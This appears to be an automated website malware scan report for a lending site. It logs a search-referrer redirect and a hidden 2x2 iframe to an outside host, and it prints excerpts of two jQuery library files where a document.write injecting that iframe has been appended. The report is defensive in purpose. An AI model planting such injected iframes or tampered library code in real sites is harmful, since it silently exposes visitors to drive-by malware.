Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://easyonlinelender.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: easyonlinelender.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 07 Sep 2014 17:25:11 GMT Location: http://elyisus.com/hmod.html Server: Apache Content-Length: 212 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://easyonlinelender.com/ | 200 OK Content-Length: 10105 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://elyisus.com/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmod.html> | ||
http://www.buysmartdomains.com/includes/jquery-1.3.2.min.js | 200 OK Content-Length: 57398 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmod.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://elyisus.com/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmod.html> | ||
http://www.buysmartdomains.com/includes/jquery.validate.min.js | 200 OK Content-Length: 24665 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){$.extend($.fn,{validate:function(options){if(!this.length){options&&options.debug&&window.console&&console.warn("nothing selected, can't validate, returning nothing");return;}var validator=$.data(this[0],'validator');if(validator){return validator;}validator=new $.validator(options,this[0]);$.data(this[0],'validator',validator);if(validator.settings.onsubmit){this.find("input, button").filter(".cancel").click(function(){validator.cancelSubmit=true;});this.sub document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http: Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://elyisus.com/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmod.html> | ||
http://easyonlinelender.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=easyonlinelender.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://easyonlinelender.com/
Result: easyonlinelender.com is not infected or malware details are not published yet.
Result: easyonlinelender.com is not infected or malware details are not published yet.